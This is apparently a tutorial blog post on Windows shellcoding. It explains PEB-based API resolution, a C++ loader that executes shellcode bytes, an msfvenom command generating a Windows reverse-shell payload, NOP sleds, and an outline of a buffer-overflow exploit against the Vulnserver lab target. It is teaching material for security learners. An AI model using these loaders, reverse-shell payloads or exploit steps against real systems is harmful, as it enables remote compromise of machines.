Windows Shellcoding (In-Depth)
Published: 2025-07-15
Author: JAKESWIZ
Motivation
The primary focus of this writeup is to showcase the beauty of the Windows operating system, the science and anatomy behind it, and its overall complexity that we all take for granted.
There is an EXTREME LACK of information publicly available about Windows shellcoding. The resources that do exist overcomplicate things. This guide was created so you do not have to go through the same struggle.
What is Shellcode?
Shellcode is a piece of machine code (often very small) derived from Assembly code, allowing direct access/control to the CPU. It is a small program executed after exploiting a software vulnerability, usually injected into memory.
What Can Shellcode Do?
- Execute a shell on the target system (reverse or bind shell)
- Open a backdoor
- Act as a "dropper" calling out to malicious C2
- Aid in privilege escalation
- And much more
How Shellcode is Delivered
- Memory corruption bugs
- Network-based delivery
- Local privilege escalation
- Local file-based delivery
- "Loaders"
- Physical/external delivery mechanisms
Where Does Shellcode Come From?
- Custom Assembly → "Carve" using
objdump→ byte string (least convenient, most stealthy) - Generated via
msfvenomor from Exploit-DB, ShellStorm, GitHub (most convenient, but signatures likely exist)
msfvenom -p windows/shell_reverse_tcp LHOST=localhost LPORT=1337 -f c
Windows vs. Linux Shellcode
| Windows | Linux |
|---|---|
| Different calling convention, no direct syscalls | Direct syscall interface (int 0x80 or syscall) |
| Relies on WinAPI (WinExec, CreateProcessA, LoadLibrary, GetProcAddress) | |
| API functions resolved at runtime | |
| Must locate DLLs via PEB/TEB and parse export tables | |
| Naturally larger | Usually smaller |
Processes and Threads
Processes: Programs running within Windows OS. Can be started by user or OS. Created via CreateProcess() → CreateProcessInternal() → NtCreateUserProcess().
Threads: A set of instructions that can be executed independently within a process. Each thread has its own Thread Local Storage (TLS) within the TEB.
The PEB & TEB
The PEB (Process Environment Block) holds information of every process running in userland (binary info, heap info, etc.).
The TEB (Thread Environment Block) holds information about the thread and points to the PEB.
Both are internal Windows data structures leveraged by malware/exploit developers. Understanding both is mandatory for Windows shellcoding.
Shellcode Navigation on Windows
- Read
PEB→LDR→InMemoryOrderModuleList(linked list) - Iterate through linked list to find
kernel32.dll(always loaded) - Parse export table to find
GetProcAddress(),LoadLibraryA(), etc. - Dynamically resolve WinAPI calls
Undocumented Structures
Windows internals contain many undocumented structures to protect the OS and users. They remain undocumented to make life harder on reverse engineers, malware authors, and exploit developers.
Workarounds:
- Utilize "undocumentation" sites with reverse-engineered structures
- Use debugging tools (WinDbg, x64dbg) to track data types and sizes
Anatomy of Windows Shellcode
- Assembly Code → Linked, compiled, and "carved" via
objdump - Converted to Byte String (the "bad stuff")
- Executed in Memory via a "Loader" (payloads can be encrypted/encoded to evade AV/EDR)
Simple Loader Example (C++)
#include <Windows.h>
#include <time.h>
int main() {
CHAR shellcode[] = "\x48\x31\xc9\x48\x81\(...)";
int(*loader)();
loader = (int(*)())shellcode;
loader();
return 0;
}
Dynamic WinAPI Function Address Resolution
This exact method/implementation logic can be used to dynamically resolve WinAPI function addresses every single time you craft shellcode.
High-Level Breakdown
- Shellcode locates
kernel32.dllin memory via PEB - Uses
GetProcAddress()to resolveWinExec() - Calls
WinExec("cmd.exe")
How to Always Find the PEB
The PEB offset (0xC) remains consistent throughout each process creation process — we can always rely on it.
Steps to include in every Windows shellcode:
- Dynamically resolve addresses by locating the PEB
- Locate PEB offset
0xC(pointer toPEB_LDR_DATAwhich holds loaded DLLs) PEB + 0xC→kernel32.dllentry (base ofkernel32.dll)- When a DLL is dynamically loaded, it's stored at offset
DllBase(0x18) — the start of the linked list - Equation:
DLLBase - InMemoryOrderLinks = 0x18 - 0x8 = 0x10(finds base ofkernel32.dll)
Perspective: C vs. Assembly
C Representation (clear, easy, less control):
int main() {
WinExec("cmd.exe", 0);
return 0;
}
Assembly Representation (complex, more control):
; Finding base address of kernel32.dll
xor ecx,ecx
mov eax,[fs:0x30]
mov eax,[eax+0xc]
mov esi,[eax+0x14]
lodsd
xchg eax,esi
lodsd
mov ebx,[eax+0x10]
; Finding Export table of kernel32.dll
mov edx,[ebx+0x3c]
add edx,ebx
mov edx,[edx+0x78]
add edx,ebx
mov esi,[edx+0x20]
add esi,ebx
xor ecx,ecx
; ... (full assembly available in original writeup)
Why MessageBoxA() is a Solid Beginner Payload
- Simple API call with only four arguments (owner window, message, title, style)
- Confirms successful code execution visually
- Requires no complex setup or external communication
- Avoids overhead of spawning processes or handling strings externally
- Virtually no dependencies (part of
user32.dll- loaded in almost any GUI application)
Building Your First Shellcode
Generate with msfvenom
msfvenom -p windows/messagebox TEXT="HELLO WORLD" TITLE="MESSAGEBOX" -f c
Compile Custom Assembly
nasm -f win32 MessageBoxA.s -o MessageBoxA.o
ld -m i386pe -o MessageBoxA-ASM.exe MessageBoxA.o
"Carve" Shellcode with objdump
objdump -d ./MessageBoxA.s | grep -e '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: | cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'
Common Pitfalls
Compatibility Issues (x86/x64)
- x86 target → x86 shellcode
- x64 target → x64 shellcode
- Different registers due to calling convention (
stdcallfor x86,fastcallfor x64) - Different data sizes lead to stack misalignment
Null Bytes (\x00) and Bad Characters
- Null bytes act as string terminators in C environments, truncating shellcode
- Bad characters cause corruption, filtering, or encoding issues
NOP Sleds
A "landing pad" for your CPU:
- Increases exploit reliability (especially in buffer overflows)
- Creates a safe "landing zone" for shellcode
- "Pads" memory and "absorbs" imprecision
- Can indirectly increase payload size without impacting logic
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
Real-World Application: Exploiting Vulnserver
Target: Vulnserver (TRUN command buffer overflow)
Vulnerable code:
void Function3(char *Input) {
char Buffer2S[2000];
strcpy(Buffer2S, Input); // No bounds check!
}
Trigger condition:
if (strncmp(RecvBuf, "TRUN ", 5) == 0) {
if ((char)RecvBuf[i] == '.') {
Function3(TrunBuf);
}
}
Exploit flow:
1. Send TRUN . + payload longer than 2000 bytes
2. Overflow buffer and overwrite EIP with JMP ESP address
3. Execute NOP sled + shellcode
⛧ Now go break things (ethically) ⛧